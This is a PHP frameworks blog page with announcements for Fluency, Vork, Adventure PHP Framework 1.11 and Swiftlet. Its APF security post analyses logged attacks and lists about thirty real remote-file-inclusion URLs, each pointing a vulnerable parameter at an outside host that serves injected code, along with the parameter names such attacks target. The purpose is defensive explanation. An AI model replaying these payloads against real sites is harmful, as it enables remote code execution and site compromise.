»
S
I
D
E
B
A
R
«
Sponsored Links


Fluency: a minimalistic HMVC web framework for PHP 5.3
Mar 13th, 2010 by fluency

The Fluency framework is a minimalistic web framework for PHP 5.3. Its only purpose is dispatching HTTP requests and providing the developer a way to handle them following the MVC architectural pattern. Hierarchical MVC (HMVC) is supported out of the box, meaning that separate sections of the served content can be provided by multiple controllers.

Example action codeFluency takes some inspiration from functional programming. Actions (controllers), views and action filters are all internally represented as functions. This provides many advantages, for example, views can be composed like mathematical functions: compare the function composition f(g(x)) with the composite renderer "layout + post".

Because actions (controllers) are also functions and can only return a single value, the use of hierarchical MVC, that is, using separate actions to provide separate sections of the content, is highly encouraged, also helping to achieve a proper separation of concerns.

Generally, Fluency favors convention over configuration, but the conventions are not hard-coded and can be easily changed. The resolution of action, view and action filter names is a responsibility of resolvers, which are, again, functions, which reside in the application bootstrap script and can be easily replaced.

As already mentioned, Fluency aims to be lightweight and avoids reinventing the wheel by including only the most basic functionality, that is, request dispatching, URL routing, rendering and action filtering. If that matches your attitude towards web frameworks, you should definitely give Fluency a try!

Vork, open-source PHP framework designed for rapid development of performance-oriented scalable applications
Feb 24th, 2010 by NewUser

Vork Enterprise PHP Framework

Vork is an open-source PHP framework designed for rapid development of performance-oriented scalable applications.

The mission of Vork is to provide an MVC architecture and full-featured toolkit in a gimmick-free no-frills approach without adding overhead, creating slow & unscalable abstraction layers or re-inventing native PHP functionality.

Rapid Application Development

  • Native PHP interface with intuitive naming convention, no need to learn new terminology or syntax
  • Hello World! in 5-minutes or less with LAMP/WAMP configuration
  • Developers that already know PHP can use Vork productively within minutes

Performance-Oriented, Scalable, Green and Economical

  • Green-IT: Vork applications serve more traffic with less servers!
  • Enterprise-grade Vork platform has no slow abstraction layers or re-invented PHP functionality
  • Out-of-the-box response time for a Hello World! including making a database connection is typically just 0.0065 seconds!
  • Built-in support for multiple master/slave database configurations with tools to enforce security and increase SQL-statement efficiency
  • Automatically loads code & objects that are needed for the instance and not a byte more!
  • Vork can be configured to operate without any disk-IO to further reduce load time

Standards-Compliant

  • XHTML 1.1
  • PHP 5.0 – 5.3+
  • E_ALL | E_STRICT
  • Section 508
  • W3C WAI
  • Full MVC stack including layouts and components
  • All tools produce valid XHTML 1.1 with semantically-correct markup
  • Accessibility is automated as much as possible to meet Section 508 and W3C WAI standards
  • Code is open-source, built for PHP 5 and fully documented using the phpDocumentor DocBlock standard
  • Universal database support without abstraction layers; ability to easily change database brands at any time
  • Object-oriented source code is E_ALL | E_STRICT and adheres to the Zend Framework Coding Standards
  • Concise URL format is ideal for search engine optimization (SEO) and is easy to communicate verbally
  • CakePHP and Zend Framework objects can be imported into Vork; Vork Helpers and components can be used within Zend Framework and CakePHP
  • CSS-reset with default styles to provide cross-browser display consistency verified in Firefox, Google Chrome, Safari (OS X, iPhone & Windows) and IE6, 7 & 8

Extensive Toolset

  • E-commerce tools to validate & charge credit cards, accept PayPal payments, get UPS shipping rates, track a package, generate QR codes & more!Vork can generate QR codes and 3D charts!
  • Simplified use of Google tools: Maps, Charts, Analytics, AdSense, Sitemap, Payments, Translate
  • Amazon Web Services connection interface with automated caching mechanism
  • One-line of code turns any controller or action into a full-featured Wiki including a Wiki search engine
  • Forms maintain state automatically + ample tools include a WYSIWYG textarea that produces valid XHTML 1.1 markup and works in every browser
  • Internationalization (i18n) – multilingual forms allow users to easily type characters in other alphabets by pressing the phonetically-equivalent English keys
  • Integration with all mainstream JavaScript frameworks: YUI, jQuery, Prototype, MooTools, script.aculo.us, Dojo, SWFObject, Ext Core, Chrome Frame
  • Universal log-in/log-out/forgot-password utility
  • Turn any page of your application into a URL shortening site
  • User input validity is verified both in JavaScript (for user-experience) and in PHP (for security) – form validation rules are only written once
  • Extensive HTML helper functions including generation of Twitter Tweet links, tag clouds and simplified embedding of Adobe Flash
  • Consistent interface to many 3rd-party tools including Meetup event management & sharing boxes like: // Bookmark and Share
  • Email tools including outgoing-mail templates that operate like MVC-elements & spam-proof email address display tools
  • AJAX tools including inline language translation and simplified data-loading
  • Completely automatic SSL-link management to simplify transitions between https:// and http:// pages
  • Image management tools to watermark an uploaded image + generate multiple images in different sizes (fullsize, thumbnail, etc.)
  • POST utility to simplify connecting to web services
  • Effortless media integration including Flickr feeds, YouTube videos and embedding an MP3 player
  • Default 404 “not found” page has a Google Search box pre-populated to search your site for content related to the missing page
  • RSS layout makes it easy for any PHP array to become an RSS 2.0 or Atom feed; RSS reader makes quick work of syndicating feeds
  • Debugging tools that output to your Firefox Firebug console

Requirements

  • PHP – any version between 5.0.2 and 5.3.x
  • A database is optional and any database or cloud-DB that is supported by PHP will work with Vork
  • Works on any web server (Apache, Microsoft IIS, etc.)
  • Works with any operating system (Linux, Windows, Mac OS X, FreeBSD, etc.)
  • Integrated caching through any package with a PHP interface (Memcached, etc.)
Hacking & the APF 2009/2010
Jan 30th, 2010 by christian

1. Introduction

In 2009, a drastic increase of XSS and code injection attacks could be recognized on the APF web site. Analyzing the log files, we found 92,334 known attacks that were catched by the framework and a total number of 672,152 attacks.

APF security award The APF Security Promise: Use the APF and profit by its security mechanisms! From scratch securely designed applications prevent the compromise of your system, guarantee the safety of your users data and of your reputation and let you put your mind at ease.

This article describes, which mechanisms are included in the APF to face this danger and to secure your custom application.

2. Attacks

2.1. Kind of attacks

As described in the article Hacking & das APF (German), most of the attacks are XSS and code injection attacks. They try to exploit vulnerabilities to inject third party content or code into the target application. Fortunately, the signature of these attacks is similar in 95% of the attacks. Here is the pattern description:

Code
1
[?|&]vulnerability_param=http://domain.tld/some/path/injection_code.ext

Merely, the name of the parameter differs from request to request:

  • tpl_pgb_moddir
  • page
  • mosConfig_absolute_path
  • sourcedir
  • file
  • dir[inc]
  • includedir
  • phpbb_root_path
  • _SERVER[DOCUMENT_ROOT]
  • _zb_path
  • cfg[path][contenido]
  • base_folder
  • spaw_root
  • includePath

The subsequent code box contains a selection of urls, that have been used to display third party content on the APF web page or to inject third party code into the APF:

1
/!rfihttp://www.nicheresaleprofits.com/cbmarketer/image/id?? /!scan23http://sito.blackdrag0n.net/Cartoon/idnew.txt? /%20%20//////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? /%20%20//?_shop_path=http://emwave.knu.ac.kr/bbs/skin/happycast_category_brown/fx29id.txt??? /%20%20//?mosconfig_absolute_path=http://largeface.com/gnuboard4/gnus/fxid.txt? /%20%20//inc/functions_inc.php?gb_pfad=http://82.146.51.16/scan/copyright.txt?? /%20%20//includes/DProtect/Framework/EmailTemplates.class.php?GLOBALS[RootPath]=http://www.junggosum.com/bbs/data/sports_2/idxx.txt?? /%20%20//modules/Forums/admin/index.php?phpbb_root_path=http://n34.biz/id1.txt??? /%20%20//tools/send_reminders.php?noSet=0&includedir=http://jnhsolutions.com.au/datingsite/temp/userimages/1.txt?? /%20%20/e404.php?DOCUMENT_ROOT=http://alandar.net/www2/log1.txt? /?mosConfig_absolute_path=http://MiNgOnIsHoW.altervista.org/ArEa511/ideal.txt???? /?dir_ws=http://champrond-en-gatine.org//administrator/components/com_joomla-visites/core/include/updates/v6id.txt?????? /?_zb_path=http://kb27.co.kr/bbs///data/cok.txt?? /tools/send_reminders.php?includedir=http://208.98.22.241/id.txt??%0D?? /?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://204.3.167.134/xxx? /modules/My_eGallery/index.php?basepath=http://urogyn.co.kr/uro/install/idxx.txt?? /show_news.php?cutepath=http://laloggia.by.ru/up/ctrl.txt?? /skin/zero_vote/setup.php?dir=http://206.126.97.21/~talagaho/id.txt??? /Neos_Chronos/header.php?base_folder=http://www.jocainmo.es/img/.z/d?? /buscar.php?query=http://www.candidography.com/id1.txt?? /?_PHPLIB[libdir]=http://cdshop.net.ru////cron/hjr.txt?? /inc/cmses/aedating4CMS.php?dir[inc]=http://daiyangmetal.co.kr/intranet/zb/skin/ggambo5100_gallery//colby/id.txt?? /naboard_pnr.php?skin=http://www.cinepopbrasil.com.br/sistem.txt??? /phpSecurePages/secure.php?&cfgProgDir=http://www.steannareptile.it//administrator/idi.txt??? /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://tdaa.by.ru/safe.txt??? /skin/ggambo7002_board/contact.php?dir=http://hana.nef-i.co.kr/pds/zfxid1.txt?? /jahoot.com/search.php?=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt?? /PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://laloggia.by.ru/up/ctrl.txt?? /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?http://musicadelibreria.net/footer?? /Page//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://kb27.co.kr/bbs///data/cok.txt??

The files xss_report_2009_with_urls_grouped.txt.gz and xss_report_2009_with_urls_uniq.txt.gz contain a variety of urls, that have been used during 2009 attacks. xss_report_2009_with_urls_uniq.txt.gz contains a complete list of urls, xss_report_2009_with_urls_grouped.txt.gz contains a grouped list with identical base urls.

2.2. Reported attacks

After having checked Apache’s access logfiles, we started to analyze the application log files. This effort resulted in 3 groups of attacks. All of them tried to manipulate the url to inject content or code to the application:

1
parse_url(/Seite/048-Webseite-erstellen%20%20/page.php?doc=http://unixstats.org/tools/idxx.txt??): Unable to parse URL (Number: 2, File: ***/apps/tools/link/frontcontrollerLinkHandler.php, Line: 306) [Document::__loadContentFromFile()] Design "Seite" not existent in namespace "modules::comments::pres::templates"! Please check your template code (<29e6fe038415c51c1bbac0271949edf5 /><a name="comments"></a><h2><html:getstring namespace="modules::comments" config="language" entry="header.title" /></h2><68a3d33630357505bfe4dd96dbcb492e />). (Number: 256, File: ***/apps/core/pagecontroller/pagecontroller.php, Line: 1378) [Frontcontroller::__parseActions()] No config section for action key "setLangu" available in configuration file "***_actionconfig.ini" in namespace "sites::demosite::biz::actions" and context "sites::***"! (Number: 256, File: ***/apps/core/frontcontroller/Frontcontroller.php, Line: 555)

The first line is a try-out to inject external code. If the offender would have been successful, the code is used to spy out information about the webserver and the application running on the machine. Subsequent request are then used to explicitly manipulate the application and the content.

In case the developer uses URL rewriting, such attacks ara quite worthless, because the InputFilter rewrites the url to a generic param value couple.

In case the developer uses the APF components like the LinkHandler or the FrontcontrollerLinkHandler, urls like presented above are recognized semantically invalid and an error is thrown. This error can be caugth and logged by the integrated Error handling very easily.

The second line describes the attempt to manipulate a known parameter of the application to display third party content. Potentially, the APF offers the chance to manipulare the template included by the <core:importdesign /> taglib by changing the url, but the template path is created with security in mind.

In the third line the attacker tries to manipulate a param of a front controller action to execute the desired action. Within the APF, actions are defined within a configuration file and the url params only refer to this configuration. Hence, it is not possible to successfully manipulate an action call by url.

3. Error handling

In order to not provide much information to the attacker, it is recommended to implement a special ErrorHandler that logs the upcoming errors to a log file and keeps quiet on the cause of the error.

The wiki page Script kiddies ErrorHandler (German) describes, how you can implement such a ErrorHandler.

Adventure PHP Framework (APF) 1.11 released!
Jan 30th, 2010 by christian

press-logoThe APF team is proud to anounce the new website together with the 1.11 stable release.

Revision 1.11 comes up with a revised version of the form support on the basis of taglibs. Now generic definition of validators and filters on the basis of the observer pattern is supported and forms can be easier adjusted to own needs.

The OR mapper GenericORMapper, already added in the release 1.9, was extended with tools to automatically setup and update a database. Now the developer can completely concentrate on the development of the logic of the application since the storage of the objects is completely managed by the mapper.

Part of the release’s performance optimization were optimizations in the core of the frameworks and the rework of the integrated BenchmarkTimer. It now supplies the developer with a better graphical representation of the measurements to find hot spots within an application. Thus an application can be optimally prepared for operation.

With release of version 1.11 the support for PHP 4 has been announced for discontinuation and the compatibility with PHP 5.3 has been improved. The coming version 1.12 will focus on the extension of the new form support and the rework of the configuration component.

The new release files can be downloaded from http://adventure-php-framework.org/Page/008-Downloads.

New PHP5 Framework: Swiftlet
Jan 11th, 2010 by ElbertF

I’d like to introduce a new framework called Swiftlet (PHP5, OOP, MVC):

http://swiftlet.org

Please see the Wikipedia page for more information:

http://en.wikipedia.org/wiki/Swiftlet_PHP_Framework

Cheers.



»  Substance: PHP Frameworks   »  SiteMap